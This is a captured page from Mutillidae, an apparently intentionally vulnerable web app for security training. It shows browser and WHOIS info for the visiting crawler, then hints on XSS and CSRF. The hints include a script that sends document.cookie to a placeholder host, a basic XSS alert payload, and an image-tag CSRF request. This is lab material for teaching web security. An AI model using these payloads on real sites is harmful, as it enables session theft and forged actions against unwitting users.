Mutillidae: Born to be Hacked

Version: 2.1.19 Not Logged In

Site hacked...err...quality-tested with Samurai WTF, Backtrack, Firefox, Burp-Suite, Netcat, and these Mozilla Add-ons

Mutillidae
Channel

Developed by Adrian "Irongeek" Crenshaw and Jeremy Druin

Browser Information

Back
Info obtained by PHP

Client IP 172.10.10.1

Client Hostname 172.10.10.1

Operating System ClaudeBot/1.0

User Agent String Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)

Referrer https://server.vulnapp.id/mutillidae/index.php?do=toggle-hints&page=browser-info.php

Remote Client Port 44376
WhoIs info for client IP
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 172.10.10.1"
#
# Use "?" to get help.
#

NetRange:       172.0.0.0 - 172.15.255.255
CIDR:           172.0.0.0/12
NetName:        SIS-80-8-2012
NetHandle:      NET-172-0-0-0-1
Parent:         NET172 (NET-172-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   AT&T Enterprises, LLC (AEL-360)
RegDate:        2012-08-20
Updated:        2024-12-05
Ref:            https://rdap.arin.net/registry/ip/172.0.0.0



OrgName:        AT&T Enterprises, LLC
OrgId:          AEL-360
Address:        9380 STATION ST
City:           LONE TREE
StateProv:      CO
PostalCode:     80124
Country:        US
RegDate:        2024-11-22
Updated:        2025-10-14
Ref:            https://rdap.arin.net/registry/entity/AEL-360


OrgRoutingHandle: ROUTI59-ARIN
OrgRoutingName:   Routing POC
OrgRoutingPhone:  +1-999-999-9999 
OrgRoutingEmail:  DL-routing_poc@att.com
OrgRoutingRef:    https://rdap.arin.net/registry/entity/ROUTI59-ARIN

OrgTechHandle: ICC-ARIN
OrgTechName:   IP Team
OrgTechPhone:  +1-888-876-2382 
OrgTechEmail:  rm-ipspecialist@att.com
OrgTechRef:    https://rdap.arin.net/registry/entity/ICC-ARIN

OrgTechHandle: ZS44-ARIN
OrgTechName:   IPAdmin-ATT Internet Services
OrgTechPhone:  +1-888-510-5545 
OrgTechEmail:  ipadmin@semail.att.com
OrgTechRef:    https://rdap.arin.net/registry/entity/ZS44-ARIN

OrgAbuseHandle: ABUSE7-ARIN
OrgAbuseName:   abuse
OrgAbusePhone:  +1-919-319-8167 
OrgAbuseEmail:  abuse@att.net
OrgAbuseRef:    https://rdap.arin.net/registry/entity/ABUSE7-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#
Cookie showhints 1
Cookie PHPSESSID 49c5e042c32d69b8e152d14bbd5786ec
Info obtained by JavaScript

Browser Name

Browser Codename

Browser Version

Cookie Enabled?

Platform

User Agent

CPU Class

System Language

Resolution

Color Depth

Referrer

Plug-Ins
Hints
For XSS:XSS is easy stuff. This one shows off both reflected (you see the results instantly) and stored (someone can run across it later in another app that uses the same database). "<script>alert("XSS");</script>" is the classic, but there are far more interesting things you could do which I plan show in a video later.
For some hot cookie stealing action, try something like:
								<script>
									new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
								</script>
								
Check out Rsnake's XSS Cheet Sheet for more ways you can encode XSS attacks that may allow you to get around some filters.

For CSRF:You can create another page someplace and make a link to an image that is not an image. You can also send someone an HTML email with a link inside. Sending links over HTML aware Instant Messaging like Communicator also works. One of the quietest methods is to use HTML injection to poison a web page thus creating a persistant attack. When a user visits the poisoned page, their browser will reach out to the targe page. Using an AJAX request can keep the rouge tranaction silent. You could use something like the following:
<img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
This is the easy way to do CSRF with the GET method. Login as someone, make your page with the link image someplace else, and then view it. You should now see something new on the comment wall.

For Cross Site Request Forgery, a tool like the Social Engineering Toolkit by Dave Kennedy can help.